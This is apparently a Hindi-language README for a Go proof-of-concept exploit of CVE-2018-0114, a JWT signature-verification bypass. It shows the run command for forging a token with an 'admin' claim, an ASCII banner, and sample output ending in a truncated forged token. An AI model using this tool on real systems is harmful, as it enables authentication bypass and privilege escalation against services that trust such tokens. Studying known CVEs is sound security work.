
CVE-2018-0114 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो मनमाने दावों के साथ नकली JWT टोकन उत्पन्न करता है, हस्ताक्षर सत्यापन बाइपास भेद्यता प्रदर्शित करता है।
संदर्भ: CVE-2018-0114
नोट: केवल शैक्षिक उद्देश्यों के लिए।
दावा "admin" के साथ JWT उत्पन्न करने के लिए, प्रोजेक्ट निर्देशिका में निम्नलिखित कमांड चलाएँ:
go run . --claim=admin
____ __ __ ____ ___ __ _ __ __ _ _ __ __
/\ _`\ /\ \/\ \ /\ _`\ /'___`\ /'__`\ /' \ /'_ `\ /'__`\ /' \ /' \ /\ \\ \
\ \ \/\_\ \ \ \ \ \ \ \ \L\_\ /\_\ /\ \ /\ \/\ \ /\_, \ /\ \L\ \ /\ \/\ \ /\_, \ /\_, \ \ \ \\ \
\ \ \/_/_ \ \ \ \ \ \ \ _\L _______ \/_/// /__ \ \ \ \ \ \/_/\ \ \/_> _ <_ _______ \ \ \ \ \ \/_/\ \ \/_/\ \ \ \ \\ \_
\ \ \L\ \ \ \ \_/ \ \ \ \L\ \/\______\ // /_\ \ \ \ \_\ \ \ \ \ /\ \L\ \/\______\ \ \ \_\ \ \ \ \ \ \ \ \ \__ ,__\
\ \____/ \ `\___/ \ \____/\/______/ /\______/ \ \____/ \ \_\ \ \____/\/______/ \ \____/ \ \_\ \ \_\ \/_/\_\_/
\/___/ `\/__/ \/___/ \/_____/ \/___/ \/_/ \/___/ \/___/ \/_/ \/_/ \/_/
[x] Generating JWT with payload "admin" ...
[x] Keys Generated
[x] Signature Signed
eyJhbGciOiJSUzI1NiIsI.......